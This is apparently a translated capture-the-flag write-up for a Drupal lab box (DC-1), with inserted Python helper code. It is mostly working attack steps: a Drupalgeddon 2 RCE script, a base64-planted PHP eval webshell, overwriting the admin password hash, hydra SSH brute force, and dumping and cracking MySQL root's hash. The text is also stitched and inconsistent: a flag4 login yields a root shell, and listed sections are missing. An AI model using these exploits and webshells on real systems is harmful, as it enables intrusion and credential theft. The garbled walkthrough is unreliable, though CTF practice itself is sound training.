Contents
Challenge: comprehensive range penetration, Drupal. Web service: http://114.132.230.222:14180/ ; SSH service IP: 114.132.230.222, SSH service port 14122
1. Payload for flag1
2. Finding the internal IP
3. mysql_pwd
4. How to obtain mysqlflag
5. flag4 webadmin
6. flag4 has no description and must be searched for: flag4.txt under the home directory
7. bmaqflag: browse a few common directories to get the flag
8. pwd_of_flag4: the hint says the flag is the SSH password of flag4; ordinary wordlists do not contain it, so the hint has to be found first
9. thefinalflag
10. Using a public/private key pair to obtain full root
11. Finding the hash of root in MySQL
12. The last flag is whsec{Apples}
Challenge: comprehensive range penetration, Drupal
Web service: http://114.132.230.222:14180/
SSH service IP: 114.132.230.222, SSH service port 14122
1. Payload for flag1
The first flag is a text file in the web root:
http://114.132.230.222:14180/flag1.txt
Every good CMS needs a config file - and so do you. whsec{1552c03e78d38d5005d4ce7b8018addf}
The hint points at the CMS configuration file, which is what step 3 reads.

2. Finding the internal IP
On Kali, probe the target with the exploit script drupa7-CVE-2018-7600.py (Drupalgeddon 2, unauthenticated remote code execution in Drupal 7). whoami returns www-data, but ifconfig produces no output at all:
python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "whoami"
python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "ifconfig"
The reason is that ifconfig lives in a sbin directory that is not on the PATH of the www-data process, so the command is simply not found. Check where the binary lives:
┌──(rootkali)-[/home/kali/Desktop]
└─# which ifconfig
/usr/sbin/ifconfig
Kali has a merged /usr, so its copy is /usr/sbin/ifconfig; on the Debian target the same binary is /sbin/ifconfig. Run it by absolute path:
┌──(rootkali)-[/home/kali/Desktop]
└─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "/sbin/ifconfig"
The output lists the address of the internal interface, so the inner_ip flag is whsec{192.168.1.8}
3. mysql_pwd
Search for where Drupal keeps its MySQL configuration; it is
/sites/default/settings.php
Read the database configuration through the same exploit:
┌──(rootkali)-[/home/kali/Desktop]
└─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "cat sites/default/settings.php"
The configuration contains:
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
The mysql_pwd flag is whsec{R0ck3t}. The same credentials (dbuser / R0ck3t on localhost) are reused in step 11.
4. How to obtain mysqlflag
The easiest approach is to drop a one-line PHP webshell, connect to it with AntSword (蚁剑) and use its database client to locate mysqlflag. That requires a directory www-data can write to, so list the web root first:
┌──(rootkali)-[/home/kali/Desktop]
└─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "ls -al"
drwxr-xr-x 9 www-data www-data 4096 Dec 10 20:35 .
drwxr-xr-x 12 root root 4096 Feb 19 2019 ..
-rw-r--r-- 1 www-data www-data 174 Nov 21 2013 .gitignore
-rw-r--r-- 1 www-data www-data 5767 Nov 21 2013 .htaccess
-rwxrwxrwx 1 www-data www-data 30 Dec 10 20:24 1209.php
-rw-r--r-- 1 www-data www-data 1481 Nov 21 2013 COPYRIGHT.txt
-rw-r--r-- 1 www-data www-data 1451 Nov 21 2013 INSTALL.mysql.txt
-rw-r--r-- 1 www-data www-data 1874 Nov 21 2013 INSTALL.pgsql.txt
-rw-r--r-- 1 www-data www-data 1298 Nov 21 2013 INSTALL.sqlite.txt
-rw-r--r-- 1 www-data www-data 17861 Nov 21 2013 INSTALL.txt
-rwxr-xr-x 1 www-data www-data 18092 Nov 1 2013 LICENSE.txt
-rw-r--r-- 1 www-data www-data 8191 Nov 21 2013 MAINTAINERS.txt
-rw-r--r-- 1 www-data www-data 5376 Nov 21 2013 README.txt
-rw-r--r-- 1 www-data www-data 9642 Nov 21 2013 UPGRADE.txt
-rw-r--r-- 1 www-data www-data 6604 Nov 21 2013 authorize.php
-rw-r--r-- 1 www-data www-data 720 Nov 21 2013 cron.php
-rw-r--r-- 1 www-data www-data 92 May 13 2021 flag1.txt
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 includes
-rw-r--r-- 1 www-data www-data 529 Nov 21 2013 index.php
-rw-r--r-- 1 www-data www-data 703 Nov 21 2013 install.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:35 llj.php
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 misc
drwxr-xr-x 42 www-data www-data 4096 Nov 21 2013 modules
-rwxrwxrwx 1 www-data www-data 1056 Dec 10 20:25 pq_14444.sh
drwxr-xr-x 5 www-data www-data 4096 Nov 21 2013 profiles
-rw-r--r-- 1 www-data www-data 1561 Nov 21 2013 robots.txt
drwxr-xr-x 2 www-data www-data 4096 Nov 21 2013 scripts
-rw-r--r-- 1 www-data www-data 34 Dec 10 20:27 sgcc.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:33 shellhanliang.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:35 shellweiweix666.php
-rw-r--r-- 1 www-data www-data 29 Dec 10 20:31 shellxw.phpin
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:26 shellyanzong.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:33 shellylj.php
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 sites
drwxr-xr-x 7 www-data www-data 4096 Nov 21 2013 themes
-rw-r--r-- 1 root root 93 Jun 25 07:14 tips_look_at_me.txt
-rw-r--r-- 1 www-data www-data 19941 Nov 21 2013 update.php
-rw-r--r-- 1 www-data www-data 2178 Nov 21 2013 web.config
-rw-r--r-- 1 www-data www-data 417 Nov 21 2013 xmlrpc.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:22 zwd.php
The web root is owned by www-data, so it is writable; the listing also shows other players' shells (zwd.php, llj.php, shell*.php, pq_14444.sh) and a root-owned tips_look_at_me.txt that is needed later. Write a one-line webshell into the includes directory. The one-liner (the base64 below decodes to exactly this):
<?php @eval($_POST[cmd]); ?>
Base64-encode it on Kali; use single quotes so the local shell does not expand $_POST:
┌──(rootkali)-[/home/kali/Desktop]
└─# echo '<?php @eval($_POST[cmd]); ?>'|base64
PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOyA/Pgo=
Then have the target decode it into the includes directory (-d means decode, > redirects the output into the file):
echo PD9waHAgCkBldmFsKCRfUE9TVFtjbWRdKTsKIAo/Pg==|base64 -d >/var/www/includes/cmd.php
Run that command through the exploit script (this encoded string is the same one-liner with line breaks; the file written here is cmd1.php):
┌──(rootkali)-[/home/kali/Desktop]
└─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "echo PD9waHAgCkBldmFsKCRfUE9TVFtjbWRdKTsKIAo/Pg==|base64 -d >/var/www/includes/cmd1.php"
Encoding the payload avoids the quoting problems of pushing <, ?, $ and quotes through the script's -c argument. Next, connect with AntSword (the POST parameter cmd is the connection password), then open its database connection with the credentials from settings.php.
This yields mysqlflag: whsec{279a967961adfb3557bd15ea20b5d4f8}
5. flag4 webadmin
The hint says the admin account cannot be brute-forced, and searching for how Drupal encrypts passwords turns up nothing usable, so take the straightforward route instead.
Drupal ships password-hash.sh for hashing passwords, and the hashed password is stored in the users table. Open the users table and look at admin's password.
Because the stored value is a salted hash that is not practical to crack, the plan is to replace admin's password: pick a password, hash it with Drupal's own script, and write the hash into the table.
The script lives at /var/www/scripts/password-hash.sh. Despite the .sh extension it is a PHP file, so run it with php:
php /var/www/scripts/password-hash.sh drupal >pwd.txt
If it errors because the includes directory cannot be found, copy includes from the Drupal root next to the script:
cp -R includes ./scripts/
(The script resolves includes/ relative to the current working directory, so running it from /var/www, the Drupal root, avoids the copy.)
This produces the hash:
password: drupal hash: $S$DvUoRrx0BW.PyseWVlz84zSlmfdCuqN4ki31yBh5bqspDWxnehk8
Connect to the database and replace the stored hash with the following SQL:
update users set pass="$S$DvUoRrx0BW.PyseWVlz84zSlmfdCuqN4ki31yBh5bqspDWxnehk8" where name="admin";
If Drupal complains about too many failed login attempts, also clear the flood table, which is where it records failed logins for throttling:
TRUNCATE flood;
Log in as admin with the password drupal and take the flag: whsec{3e821652054b469cb19403fbc3f45bde}
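Drupal's $S$ hash can also be produced and verified without running password-hash.sh on the target. The following is an added example written for this writeup, not code from the page and not Drupal's own source: it ports the logic of user_hash_password() / user_check_password() from includes/password.inc (iterated SHA-512 with a phpass-style base64 alphabet, cut to 55 characters) to Python. It assumes Drupal 7 with the default cost of 2^15 iterations, which is the 'D' after "$S$" in the hash above; the PAGE_HASH constant is the hash the page shows for "drupal".

```python
"""Drupal 7 password hashing ($S$ scheme), ported to Python.

Added example for this writeup; not code from the page and not Drupal's
own code. It mirrors user_hash_password() / user_check_password() from
includes/password.inc so a replacement hash for users.pass can be made
offline, and a dumped hash can be verified against a guess.
Assumption: Drupal 7 with the default cost of 2^15 iterations.
"""
import hashlib
import hmac
import os
from typing import Optional

# phpass alphabet used by Drupal's _password_itoa64()
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
DRUPAL_HASH_LENGTH = 55          # stored hashes are cut to 55 characters
DRUPAL_HASH_COUNT = 15           # log2 of the default iteration count ('D')
DRUPAL_MIN_HASH_COUNT, DRUPAL_MAX_HASH_COUNT = 7, 30

# the hash password-hash.sh printed for "drupal" on the page
PAGE_HASH = '$S$DvUoRrx0BW.PyseWVlz84zSlmfdCuqN4ki31yBh5bqspDWxnehk8'


def password_base64_encode(data: bytes) -> str:
    """phpass base64: custom alphabet, 6 bits per char, no padding (_password_base64_encode)."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def password_crypt(password: str, setting: str) -> Optional[str]:
    """Port of _password_crypt('sha512', ...); setting = "$S$" + cost char + 8-char salt."""
    setting = setting[:12]
    if len(password) > 512 or not setting.startswith('$S$') or len(setting) != 12:
        return None
    count_log2 = ITOA64.find(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12]
    pw = password.encode('utf-8')
    digest = hashlib.sha512(salt.encode('utf-8') + pw).digest()
    for _ in range(1 << count_log2):          # 2^count_log2 further rounds, as in the PHP do/while
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + password_base64_encode(digest))[:DRUPAL_HASH_LENGTH]


def hash_password(password: str, salt_bytes: Optional[bytes] = None,
                  count_log2: int = DRUPAL_HASH_COUNT) -> str:
    """user_hash_password(): 6 random bytes become the 8-character salt."""
    salt = password_base64_encode(salt_bytes if salt_bytes is not None else os.urandom(6))
    return password_crypt(password, '$S$' + ITOA64[count_log2] + salt[:8])


def check_password(password: str, stored_hash: str) -> bool:
    """user_check_password() for $S$ hashes, with a constant-time comparison."""
    computed = password_crypt(password, stored_hash)
    return computed is not None and hmac.compare_digest(computed, stored_hash)


def hash_cost(stored_hash: str) -> int:
    """Iteration count encoded in the fourth character of a $S$ hash."""
    return 1 << ITOA64.find(stored_hash[3])


if __name__ == '__main__':
    new_hash = hash_password('drupal')
    print(new_hash)                              # usable in: update users set pass='...' where name='admin';
    print(check_password('drupal', new_hash))    # True
    print(hash_cost(PAGE_HASH))                  # 32768
    print(check_password('drupal', PAGE_HASH))   # the page's own hash checked against "drupal"
```

A hash generated this way is a drop-in value for the UPDATE statement above; the salt is random, so every run gives a different string that still verifies. hash_cost() is worth a look before attempting any offline cracking of a dumped Drupal hash: 32768 SHA-512 rounds per guess is why the hint says admin cannot be brute-forced and why replacing the hash is the practical route.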
6. flag4 has no description and must be searched for; it is flag4.txt under the home directory
(www-data:/home/flag4) $ cat flag4.txt
Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is?
whsec{00e6f657aa50b769a408d72396f61555}
Flag: whsec{00e6f657aa50b769a408d72396f61555}

7. bmaqflag: browse a few common directories to get the flag
(www-data:/) $ cat bmaqflag
whsec{95ed83bef92340184a099e7b08df2740}

8. pwd_of_flag4: the hint says the flag is the SSH password of flag4; ordinary wordlists do not contain it, so the hint has to be found first
When the shell was first obtained, a hint file was sitting in the web root:
(www-data:/var/www) $ cat tips_look_at_me.txt
The password of user "flag4" is a mobile phone number. 1368xxx3247,you need to find out!
Only three digits are unknown, so generate the 1000 candidates with a small Python script:
  # coding=utf-8
  # Every candidate for the mask 1368xxx3247, one per line.
  with open(r'C:\Users\hao\Desktop\dict.txt', 'w') as f:
      for a in range(0, 10):
          for b in range(0, 10):
              for c in range(0, 10):
                  pwd = '1368' + str(a) + str(b) + str(c) + '3247'
                  f.write(pwd)
                  f.write("\n")  # 1368xxx3247
Then brute-force SSH with hydra on Kali (the warning it prints is worth heeding: sshd limits parallel sessions, so -t 4 is the safer setting):
┌──(rootkali)-[/home/kali/Desktop]
└─# hydra 114.132.230.222 -l flag4 -P dict.txt ssh -s 14122
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-10 02:47:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ssh://114.132.230.222:14122/
[14122][ssh] host: 114.132.230.222   login: flag4   password: 13680313247
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-10 02:47:12
The password comes out within seconds: 13680313247. The flag is whsec{13680313247}
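The three nested loops only fit a hint with exactly three unknown digits. The following added example (written for this writeup, not the page's own script) generalises the idea to a mask with any number of unknown positions, each 'x' standing for one digit, and returns the keyspace size so you can judge whether the brute force is feasible before starting hydra. The output file name and the hydra line in the comment are assumptions.

```python
"""Expand a partially known phone number into a hydra wordlist.

Added example, not part of the original writeup: it generalises the page's
three nested loops to a mask with any number of unknown positions (each 'x'
is one digit), so the same code covers hints like 138xxxx5678. The output
path and the hydra invocation in __main__ are assumptions.
"""
import itertools
from typing import Iterator


def expand_mask(mask: str, wildcard: str = 'x', alphabet: str = '0123456789') -> Iterator[str]:
    """Yield every string obtained by replacing each wildcard with one alphabet character.

    Candidates come out in counting order (all zeros first, all nines last);
    a mask without wildcards yields itself exactly once.
    """
    positions = [i for i, ch in enumerate(mask) if ch == wildcard]
    chars = list(mask)
    for combo in itertools.product(alphabet, repeat=len(positions)):
        for pos, ch in zip(positions, combo):
            chars[pos] = ch
        yield ''.join(chars)


def candidate_count(mask: str, wildcard: str = 'x', alphabet: str = '0123456789') -> int:
    """Size of the keyspace: alphabet size to the power of the number of wildcards."""
    return len(alphabet) ** mask.count(wildcard)


def write_wordlist(mask: str, path: str) -> int:
    """Write one candidate per line (the format hydra -P expects); return the line count."""
    written = 0
    with open(path, 'w') as f:
        for candidate in expand_mask(mask):
            f.write(candidate + '\n')
            written += 1
    return written


if __name__ == '__main__':
    mask = '1368xxx3247'                       # the hint from tips_look_at_me.txt
    print(candidate_count(mask), 'candidates')
    print(write_wordlist(mask, 'dict.txt'), 'lines written to dict.txt')
    # then, for example: hydra -l flag4 -P dict.txt -s 14122 -t 4 114.132.230.222 ssh
```

With 1000 candidates and SSH as the target, the whole run takes seconds even at -t 4; the keyspace check matters when a hint leaves five or six digits open, where an online SSH brute force stops being realistic.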
Now log in as flag4 with that password:
┌──(rootkali)-[/home/kali/Desktop]
└─# ssh flag4@114.132.230.222 -p 14122
flag4@114.132.230.222's password:
Permission denied, please try again.
flag4@114.132.230.222's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Dec 11 19:15:54 2021 from 192.168.26.1
root@DC-1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-1:~#
The box identifies itself as DC-1 on a 32-bit Debian with kernel 3.2.0. Sections 9 (thefinalflag) and 10 (key-based root login) listed in the contents are absent from the body; the transcript continues from the root shell they produce.

11. Finding the hash of root in MySQL
1) Enter MySQL with the credentials from settings.php and look up the data directory:
mysql -udbuser -pR0ck3t
mysql> select @@datadir;
+-----------------+
| @@datadir       |
+-----------------+
| /var/lib/mysql/ |
+-----------------+
The mysql.user table, which holds the account hashes, therefore lives under /var/lib/mysql/mysql/. The MySQL system tables are MyISAM in this version, so the table is just a set of plain files that can be copied.
2) As root on the box, create a mysqluser database directory under /var/lib/mysql/mysql/, copy the user table's files into it, tar it up and move the archive into the web root:
root@DC-1:/var/lib/mysql/mysql# mv mysqluser.tar /var/www
3) Download it from the web root:
http://114.132.230.222:14180/mysqluser.tar
4) Copy the extracted files into the data directory of a local phpStudy MySQL: D:\phpStudy\MySQL\data
5) Open the MySQL command line from phpStudy and read root's hash:
show databases;
use mysqluser;
select * from mysqluser;
| localhost | root | *822B993B089B6BC20A6AED2EF00E6003ED3A1F13
6) Look the hash up with an online cracker; the flag for this step is whsec{822B993B089B6BC20A6AED2EF00E6003ED3A1F13}
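The value dumped from mysql.user is a mysql_native_password hash: SHA1(SHA1(password)) in upper-case hex with a leading '*'. That makes candidate checking trivial to do offline, which avoids handing a target's hash to a third-party website. The following is an added example written for this writeup, not code from the page: it implements the hash, a format sanity check and a small candidate loop. The candidate list is constructed here (it includes Apples, which the page reports as the last flag, and the dbuser password from step 3); the PAGE_ROOT_HASH constant is the value dumped above, and the result of checking it is printed rather than assumed.

```python
"""mysql_native_password hashes, as stored in mysql.user (the "*" + 40 hex form).

Added example, not from the original writeup: the algorithm is
SHA1(SHA1(password)) in upper-case hex with a leading '*', so candidates
can be checked offline against a dumped hash. The wordlist in __main__ is
constructed; the hash constant is the one dumped from the target on the page.
"""
import hashlib
import hmac
from typing import Iterable, Optional

PAGE_ROOT_HASH = '*822B993B089B6BC20A6AED2EF00E6003ED3A1F13'


def mysql_native_password(password: str) -> str:
    """PASSWORD() as computed by MySQL 4.1+ / the mysql_native_password plugin."""
    stage1 = hashlib.sha1(password.encode('utf-8')).digest()     # raw 20-byte SHA1
    return '*' + hashlib.sha1(stage1).hexdigest().upper()


def is_native_hash(value: str) -> bool:
    """Format check before trying to crack: '*' followed by 40 hex digits."""
    return (len(value) == 41 and value[0] == '*'
            and all(c in '0123456789ABCDEF' for c in value[1:].upper()))


def check(password: str, stored: str) -> bool:
    """Constant-time comparison of a guess against a stored hash (case-insensitive hex)."""
    return is_native_hash(stored) and hmac.compare_digest(mysql_native_password(password), stored.upper())


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that matches the stored hash, or None."""
    for candidate in candidates:
        if check(candidate, stored):
            return candidate
    return None


if __name__ == '__main__':
    # constructed candidate list: common defaults, the dbuser password, and the page's final flag value
    wordlist = ['root', 'password', 'R0ck3t', 'Apples']
    print(crack(PAGE_ROOT_HASH, wordlist))
```

Because there is no salt and only two SHA1 rounds, this format cracks at GPU speed (hashcat mode 300 handles it), so a short wordlist plus a rule set is usually enough for a lab box; a service like cmd5 is doing exactly this lookup on your behalf.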
12. The last flag is whsec{Apples}. Done. Online hash lookup and cracking was done with cmd5: https://www.cmd5.com/
Sharing is welcome; please credit the source when reposting: 内存溢出